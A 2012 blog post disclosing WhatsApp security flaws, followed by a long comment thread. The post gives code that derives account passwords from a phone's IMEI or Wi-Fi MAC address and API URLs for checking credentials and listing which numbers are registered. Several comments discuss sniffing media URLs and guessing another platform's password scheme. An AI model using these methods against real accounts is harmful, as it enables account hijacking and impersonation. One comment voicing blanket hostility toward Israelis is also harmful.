WhatsApp, the extremely popular instant messaging service for smartphones that delivers more than ~1billion messages per day has some serious security problems. I will try to give a detailed analysis on some of the issues.
Encryption
Until August 2012, messages sent through the WhatsApp service were not encrypted in any way, everything was sent in plaintext. When using WhatsApp in a public WiFi network, anybody was able to sniff incoming and outgoing messages (including file transfers). The company claims that the latest version of the software will encrypt messages – without giving any details on what cryptographic methods they are using (so it is safe to assume they did not do it the right way, using Public-key cryptography) . Update: their encryption is broken
However, the users mobile phone number is still being transferred in plaintext:
Authentication
The authentication is a security nightmare. On Android, the password is a md5 hash of the reversed IMEI number:
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
On iOS devices the password is generated from the devices WLAN MAC address:
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
The username is the users mobile phone number – an attacker would probably already know the number.
The IMEI can be obtained if you have physical access to the phone or if you control an app installed on the users device. The WLAN MAC address can be found using a network sniffer. Congratulations, you can now take over a users WhatsApp account¹. But how? Well, some people have done a excellent job reverse engineering the WhatsApp protocol. There is a working PHP class available that contains everything needed to build your own WhatsApp client: https://github.com/venomous0x/WhatsAPI
Got a smartphone with WhatsApp installed? Try it out yourself using the URLs known from the reverse engineered API!
https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password $countrycode = the country calling code $phonenumber = the users phone number (without the country calling code) $password = see above, for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei)) / Note that the WhatsAPP UDID has nothing to with the Apple UDID - it is something completely different.
If you did everything right, the server will answer with a XML:
<?xml version="1.0" encoding="UTF-8"?> <exist> <response status="ok" result="xxxxxxxxxxx"/> </exist>
Privacy
When WhatsApp starts it will send all numbers from your phones address book to the WhatsApp servers and check which numbers are registered with WhatsApp.
This is done like this:
https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4 $countrycode = the country calling code $yournumber = while this SHOULD be your number, it is not required, the API will accept any number $friendX = phone number (without the country calling code) from the address book that will be checked, u[] is an array so it is possible to check multiple numbers with one request
The server will answer with a XML document showing all numbers (hits) that were registered with WhatsApp, this will look something like this:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <array> <dict> <key>P</key> <string>1234567890</string> <key>T</key> <integer>10817</integer> <key>S</key> <string>Some Status Message</string> <key>JID</key> <string>23xxxxxxxxx</string> <key>NP</key> <true/> </dict> </array> </plist>
Key “P” is the users phone number, Key “T” seems to be the uptime(?), Key “S” is the users status message. Not sure about “JID” (Update: JID ist the JabberID, thanks) and “NP” yet – if you have smart guess let me know. All this information is public.
Local database encryption
Since this requires physical access to the device or a full backup (in both cases you are screwed anyway) this is less interesting but still worth a note. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup, for details read this paper: WhatsApp Database Encryption Project Report
Conclusion
Do not use WhatsApp. Really, don‘t.
¹ Actually, you can’t – it’s against the law. That being said: i did not hijack anybody’s WhatsApp account during this research and neither should you. This information is for educational purposes only.
I had the opportunity to interview with these clowns for an android dev role several moons ago..needless to say I gave up after they refused to listen to the above concerns..
Your concerns have been known for awhile
The JID is the jabber ID (country code+mobile number)
Not sure about the NP though.
JID is probably Jabber ID used for their xmpp server
We should all start using our regular XMPP accounts now! Most of us already have one. If you have a Gmail, Fastmail, Lavabit, GMX, Ovi.com, Yandex email address, you are ready to go. All that’s left to do: Install Xabber or IM+ or sth. alike on your smartphone!
If you also want to instant message on your laptop: The latest Thunderbird comes with XMPP support! Or give Jitsi or one of the many alternatives a try! Enjoy!
Really? Are there any mature, non-Java, cross-platform replacements for Jitsi that provide OTR encryption for Jingle audio and video chatting?
If so, I’d really like to hear about them.
Pidgin.
Wow, a Java hater never misses the opportunity to rant against his target.
M
Google Talk is so good!
Whats App is only fast, but now that I know these issues, tchau (bye) …
IM+ is not secure either :). A few months ago, I checked up the packets of IM+ using wireshark, and observed that all your packets are going over a third party server (probably owned by these IM+ guys). I mean, the xmpp packets go to a server, that is not the one that your jabber account resides… Seems like MitM…
Pingback: Whatsapp for webos - Page 17 - webOS Nation Forums
Pingback: How to Hack WhatsApp Messenger | Build WhatsApp API Client
Great article!
I will continue using WhatsApp though (at least until my iPhone 5 arrives) since there’s currently no alternative with the same amount of users..
You are the government’s friend if you only correspond on unencrypted channels. Not a bad thing to be the government’s friend I guess, but definitely not their enemy.
Try “Line”. It’s pretty nice! I think it’s even more well polished.
have you considered wechat?
I have a SMS flat rate with my provider…..so this is an alternative…
Try XMS. They also have web version.
These guys maybe “clowns” and their infrastructure might have some pretty interesting security holes… but they have a shit ton of investment money and even more users. They’re doing something right.
yes, money
I can agree!
Having a “shit ton” of investment money doesn’t guarantee a successful future. They keep this shit up and soon they’ll be “pivoting”.. and we all know what that means.
Really? Yes, I agree that they’ve successfully scammed investors off their money, but otherwise … Nah.
The huge success is due to the ability to easily connect with your friend via the cellphone numbers already inside your phone.
It really give a ton of useful functions with zero effort from the user, so the security is even more a problem.
I hope they will fix the issue. Meanwhile I use a proxy with a on the fly replace of my number with a bait one just to test.
peace&love
So what?
Oh wait! I was talking to a friend about drugs! Maybe someone is sniffing my conversation!
You understand that someone can hijak your account _forever_? (except if you buy a new phone to generate a new password)
Yes I understand this. But what will this person do with my account? What’s the point of doing that?
You’ll know it when it happened.
The same thing they do with a cloned cell phone. Use it for illegal purposes while pinning it on someone else if tracked.
You need a phone number and UDID before you can get to that point.
UDID is the a md5 hash of 2x WLAN Mac and the phone number is being transfered without encryption. There you have everything you got.
The WhatsAPP UDID ist not to be confused with the Apple UDID.
Ok then everyone can sniff my account right?
Even if I use my 3g connection or my home network?
If you stay on 3G and home-WiFi (obviously your home-WiFi needs to be encrypted) then you should be safe for now.
Do you think people don’t use their mobile using a public wifi? :O
The super annoying thing is that their most recent update broke the app on iPhone 4s, and they not only seem not to be aware of the problem, but also they’re seem to ignore any messages, twitts, or iTunes comments. Unless they’re going through an acquisition and couldn’t be bothered with users at the moment
It is very important for users to be made aware of this vulnerability, however the reality is, if you avoid public wifi networks it is very unlikely someone could be in a position to sniff your traffic. (not impossible, but unlikely over cell carrier network or on encrypted home access point)
It has been well documented that whatsapp sends unencrypted traffic yet the reality is they have likely decided the chances of this happening are very small, assuming the encryption of wireless carriers would suffice.
Anyone took a look on what they use on the Windows Phone?
Yes: http://www.ezioamodio.it/?p=49
Can someone suggest a feature-equivalent application that works on Android?
KakaoTalk, same as whatsapp plus there’s free calling too.
There are many. eBuddy XMS, for instance.
Try moped.com, need a Twitter account tho
talk.to is good
and then there’s NimBuzz too.
ICQ
(no it’s not a joke, it’s actually a feature-rich Google Talk and Facebook chat client)
I there a reason why everyone is avoiding Viber as an option nere ?
Viber is Israeli. You can bet the Israelis are spying on every single Viber user on earth. Never ever trust an Israeli with anything. Ever.
do not use kakaotalk, cuz its privacy policies are dangerous for security. there was phishing in korea, and almost of the users are annoying of ‘featured friend’ function.
i tried hike and i love it. It got all the nice features like group chat,filetransfer and in addition free sms(to India). And it doesnt have any such security issues and respond to their user’s concerns so promptly. but unfortunately its only supports India as of now.
I think anyone who are communicating information using IM will be using a blackberry. Most people using whatsapp are probably not that concerned with security. But still, it is a big issue that needs to be resolved.
Sorry I mean anyone who really wants to have secure IM communication via their mobile
Pingback: WhatsApp still sends phone numbers in Plain Text. Encryption is not complete.
I have done some research on my own. Mostly looking at the mediasharing function. The images you send are hosted on a public website, you just have to find the URL.
If someone intercepts your message, he will have that URL, same goes for someone having access to your message database. Even when you’ve deleted the file from your phone.
For example: I just sent this picture to my girlfriend while sniffing my WIFI. Result is an URL looking like this: https://mms504.whatsapp.net/d6/15/00/6/1/6169eeec03dc50f69456497508a9466c.jpg
Now what I have found out is that the URL isn’t completely random. In fact, nothing is (with the exception of two unknown values).
If you’d break it down it comes to this:
http://mmsservernumber, usually 300,400 or 500].whatsapp.net/[d0-d11 no idea what this is]/[day of upload 00]/[hour of upload 00 pst]/[hash first letter]/[hash second letter]/[hash].jpg
Anyone any idea on what the D stands for? And what the hash is made of?
Maybe the D is the month, since it’s 0-11. in your case it’s 6, and you said that you just sent the picture, so I’ll assume that means September. September is the 9th month, and adjusting for 0 style counting that makes it number 8.
however, just because it isn’t the right number doesn’t necessarily mean it isn’t the month. Maybe they assigned some random order to the months for “Added Security”, which seems like something they would do.
Thing is: it changes per message. Also I think the way it is setup right now is using day and hour folders, so an image never exists for longer than a month, and they just replace images in a new month. Making server cleanup unnecessary.
> Doesn’t require server cleanup
No, it does since this looks to be an MD5 hash (they seem to be fond of those) and thus is unique (to some degree) and unless they’ve done something stupid and said
$hash = md5($to.$from.date(“%M%D”.time());
it is highly unlikely that there will be a collision between two messages (and here, you would have to send a lot of photos for them to be inaccessible).
More than likely, they’ve said
$hash = md5($to.$from.time().md5_file($file_uploaded));
which would require you to send the same picture to the same person from the same account at the exact (within 1s) same time.
Oh yeah you’re right.
One thing I did notice though is that if you’d upload the same image twice, you get the same URL! Even with some time in between uploads.
And even when sending it to others.
o_0
Holly crap!
How did you sniffed the URL, where Whatsapp saves that picture?
In this case I just looked it up in the sqldatabase in data/data/apps. However you can sniff it using wireshark and a mitm attack.
Thanks for your reply!
I tried it with wireshark, but it looks like that its now encrypted. I cant fetch the URL with Wireshark. I just see the host -> http://mms05.whatsapp.net/ .. but not the full link. Any tutorial up how to decrypt the things?
What about Viber – care to investigate that one?
Yuilop looks good, as a Whatsap replacement
Pingback: WhatsApp security : frankjordans.com
You can use Cubie Messenger, which has been verified to have air-tight security. It originated from Asia, but has an English version.
If you are concerned about your privacy, just don’t use What’s App throught public WiFi networks and don’t share top secret information, this way maybe you will be safe. You also have to consider that WA is a publicity less FREE product that has some security issues you have to deal with.
Pingback: Wie Jugendliche WhatsApp nutzen | Schule und Social Media
The Windows Phone 7 client is also completely insecure (the global device id is the password). I was able to create a WP7 app that sends and receives whatsapp messages on the user’s behalf in one evening (it only needs the phone number, which an app cannot directly get from the WP7 SDK).
However, this means ANY app on a WP7 device only needs to prompt for a user’s phone number and can communicate with WhatsApp on the user’s behalf.
Very good post, thank you!
You cannot hack the account forever.
In the super rare case that someone would actually be able to apply this in real life, which is very rare and this article really *really* over exaggerates: don’t be afraid users ;), you can always login on another device which then locks in to a new password which is unknown to the malicious user.
Seriously, while the security is not optimal due to the simplicity for the users, it is not so highly insecure due to the hidden away accs. Basically: the chance of this happening to you is 1 in 250 million.. And that’s even a chance!
Stop spreading so much nonsense baseless fear
The real problem is not the WiFi sniffing, but the app databases with IMEI numbers and phone numbers.
Oh yes i can always login from another smartphone!
But that means that if someone hackin your WathsApp account you have to buy a NEW phone!
Absolutely nonsense baseless fear…
whatsapp update pushed today advising encryption now avail over wifi… ill run a trace, let you know!
Wait, isn’t it sending everything via HTTPS? Does it do cert checking?
(Thinking of intercepting it via wifi against android users)
Will Osama bin Ladin kill me because he saw my WhatsApp msg to my girlfriend when I wrote her I’m love with her? No.
People could hear me talkin in the subway – I don’t care at all. Since I am not Jason Bourne everything is cool.
Pingback: Massive Sicherheitslücken in WhatsApp | Juergen Kraemer – NETZWELT
Pingback: Whatsapp security issues. | Information Strategy
Pingback: Drecks WhatsApp! | dreitehabee
The sad thing is when someone hijacks your account there’s nothing to do, the hijacker can start impersonating you etc., even if you don’t use Whatsapp, your friends will just think you started using it like everyone else…
Guys, Guardian project makes gibber bot just for this purpose. No iPhone support though, but it is the best OTR bases client for Android so far.
Pingback: Neue Sicherheitslücken: WhatsApp gehört gelöscht | Die Sendung mit dem Internet
Pingback: WhatsHacked, WhatsCracked, WhatsSucks? WhatsApp « Subversive Bytes
Pingback: Using WhatsApp is a huge security risk | Doobybrain.com
NP = not paying?
….. or perhaps null problemo
well played sir
I have just a very very little dataset (around 4 friends xD), but in this case NP = Android. Anybody out there to disprove that?
Hey,
is anybody out there who has taken a closer look to WhatsAPI?
What steps do you’ve taken to work with it? Thank you
It is a simple messaging service. You guys do not work for the CIA, KGB, mosad or any similar organization. The greatest risk involved here is the fact that somebody could get to see what you say to your girlfriend.
Get over it. There is nothing major at risk. No lives will be put in danger and no money will be lost. WhatsApp is great application. Period.
You clearly have no clue how identity fraud works: The info leaked by WhatsApp can be used to get your OTP for your bank account. We’ll see what happens when you complain to the bank that your money is missing, and they say: “Sorry, you made a huge transfer, not our problem.”
Pingback: WhatsApp – schlecht verschlüsselt › andronews.de
NP, in most cases, in coding stands for “Not Provided”, and it’s used as a placeholder/anchor point. Good article btw
UDIDs are not possibly unknown to App sellers/coders, and all this stuff you can sniff with ethereal and tools like that is stored on THEIR server also. Can one of the critics above imagine what this could means?
Do you know how the Blackberry password is generated? I tried with MAC address and got nothing. I was going to use IMEI, but since my phone is CDMA, I’ve got MEID. I tried it too and it didn’t work.
Did you try exactly the methods that i posted? Using md5(WLANMAC.WLANMAC) or md5(strrev(IMEI))? I don’t own a Blackberry so i didn’t have the chance to test this yet… if you need help with the md5 stuff please email me: admin@fileperms.org
I tried md5(WLANMAC.WLANMAC), and md5(rev(MEID)) (which is different from IMEI, I don’t have this). None of them worked. I also tried with Blackberry’s PIN.
The BB PIN would have been my next guess, maybe it’s md5(PIN.PIN) or md5(strrev(PIN) – but that’s just guessing. If i get my handy on a BB device i will do some testing.
Hm, I’ve just noticed. I tried hex MEID, but not dec MEID. I will try again.
its simle to me, Just Back to SMS : LoL
try chatON, i dont know but maybe its taking security more serious might be better!
Pingback: Whatsapp Sicherheitslücken: Wieder mal Negativschlagzeilen - Whatsapp, Sicherheitslücke, Whatsapp Hacker - 24mobile Handy Blog für Handys und Handyverträge
whats app works without any bugs in android platform and in the means of processor itz perform amazingly over the 1ghz and the version of androids above 2.2 to till the new one android jelly bean
Hello,
do you know where user pictures are saved? Not the one which are send, but profile pictures.
Pingback: Lächerlich: “WhatsApp” unsicher wie ein offenes Scheunentor – Nutzung nicht zu empfehlen | iPhone-Ticker
Pingback: #385 iPhone 5 Adventures, Audio Compression, Getting the Most Out of Finder « Nosillacast
NP seems to indicate whether the user is using iPhone or Android.
iPhone clients will not have the NP flag, while Android clients will have NP flag set to true.
I have no idea what will happen to users using Nokia/Blackberry. I don’t have any whatsapp friend using one of those phones
Hi there
Can anybody help me to find the WhatsAPI from venomous? I can’t find it online. Maybe someone of you can send me the file or the link for downloading it?
Thanks a lot!
what about this??
https://github.com/venomous0x/WhatsAPI
Pingback: How Not to Design an Instant Messenger « kabelmast
Pingback: BBM vs WhatsApp - BlackBerry Forums at CrackBerry.com
You got to love Wireshark.
But this is scary stuff. If it’s this easy to be able to get to someone’s personal mobile phone info, what’s the point. I love Whatsapp but this is very frightening news.
Any news regarding this issue? The Android app has received several updates since this post, the latest of which (version 2.8.7326) is supposed to include a ”critical bug fix for connection issues”.
the authentification from whatsapp has changed a few days ago, so the authetification with these settings (md5 hash) doesnt work anymore…
example:
https://r.whatsapp.net/v1/exist.php?cc=43&in=66666666666&udid=3e7e75f9a30b62c0958b7ef249e1b0b0
response:
so is whatsapp now more save?? or is this already hacked?
if then, how?
Guys, my whatsupp account being hacked today.I never use wifi,only 3g& I got the latest version of it.So I just simply uninstall it&WILL NEVER USE IT AGAIN. It’s hurt when someone pretend to be u & saying something stupid in all of ur wtfgrups.When u go through it then u know it.
Is it possible to use whatsapp on 2 device that run android simultaneously?
i tried the backup restore method over the net but issue i get msg on either of the device not both.. Is is possible to get msg on both the devices??
Pingback: Anonymous
Pingback: WhatsApp and Facebook. Is there a future? | Horacio Reyes'
I wanted to see a specific site uptime sent to Whatsapp
Hi!
Does anyone outhere know why does the What’s app icon appear twice on galaxy S2, everytime it is downloaded? Could my what’s app get hijacked by simply entering my phone number and having my SIM (from behind my back of course) to receive the security code on it then enter it, and start receiving my messages on the hijacker’s mobile?
Pingback: Why Whatsapp is boon and bane at the same time | en.code-bude.net
Hi, all
I tried to use the following url just for fun:
- https://r.whatsapp.net/v1/exist.php?…
- https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password
it seems doesn’t function!!!
So, analyzing the traffic with wireshark, i see the first packet sent to the server from the client that is divided in two parts, the first (FIXED) containt the model of the phone and the telephone number, the second is a “VARIABLE” part that maybe work for the encryption of the session.
What i have seen is that this second part (variable), change every time a new session from the client to the server START.
Any idea about the encryption?
THANKS ALL.
Pingback: Whatsapp is broken, really broken | the dirk
What exactly does it mean that people can take over your account??? Can they have access to your message history? Can they see everything you write and receive after they’ve taken over your account? Can they see all your contacts and their phone numbers?
I first installed Whatsapp on my Android, and then when I bought a new Smart phone and installed it there. It then, automatically disconnected me from the old phone – so you can’t use the app on two devices at the same time with the same account – so how exactly does the ”hacker” get my private information if s/he doesn’t log in with my account first? Wouldn’t I immediately know if someone else logged inn to my account? Or do they use another program?
I also read on their support website that they do not recommend people installing whatsapp on different devices with the same phone number or exchanging it between multiple devices because it will eventually block your number from using whatsapp. Is that true?
Appreciate fast reply – thank you :)))
Great article! But, unfortunately – articles like these are more unsafe than the app itself… It’s one thing to make someone aware of something bad and a whole other to ”teach” something how to do bad… just saying..
Hello there. First: please not this article was written back in September 2012, the WhatsApp Team has fixed some of the flaws that are described here. Although an attacker can not access the message history, he can send and receive message using the hijacked account.
Hello , I don’t use whatsapp so I know nothing about it
But my friend told me that someone added her on whatsapp , and he could hack ALL her phone files , like pictures , messages history …etc
Even he sent her the pictures as a proof
SO , , , Is there such thing??? like hacking others phones using whatsapp???
Is it really possible to be done?
Hello,
I am going nuts from past one week as my whatsapp account is returning following error and not allowing to use the application at all:
“Your phone no …………. Is not allowed to use our service”
It happened all of the sudden when I was sending broadcast message to all my contacts. A screen appear requesting to verify the phone no and after Adding the phone no it returns above error.
Have been writing whatsapp support constantly but no response from their end.
Pls can some one help making my whatsapp work on same phone no.
Thanks in advance!
Asad
the same problem exist with me…. don’t know what to do…… can any body help……
Hello All,
can any one guide me how can i solve the following error of whatsapp on my BB9900 as it says my phone number is blocked or something.
How can i unblock my number and use the whatsapp ?
Error: Your phone number +xxxxxxxxxx is no longer allowed to use our service.
i have already wrote to whatsapp support many times but no response even after a week is passed..
Pls assist
Hello
Last year November my phone couldn’t send or receive whattsapp messages for about a week it says error. I couldn’t even go in to whattsapp and now 3 people who are my contacts received a strange messages and they all think I send it. I am 100% sure I didn’t send it.
Do you think my phone was hacked?
How do I proof to everybody that I didn’t send that message? I am desperate to proof my innocence.
Pingback: Krönika: Därför borde du sluta använda WhatsApp | Ajour
Pingback: Threema statt WhatsApp | Jonas Schönfelder
Pingback: Securing VoIP in the Presence of Pervasive Monitoring « Hannes Tschofenig
Pingback: Whatsapp Privacy Snafu - BlackBerry Forums Support Community
Pingback: WhatsApp is broken, really broken | fileperms | senk9@wp
Pingback: Sinnloser Hype: Threema. | laclaro
Pingback: Facebook shares your data but what about WhatsApp? Do you still want to use it? | HackRead – Latest Cyber Crime – Information Security – Hacking News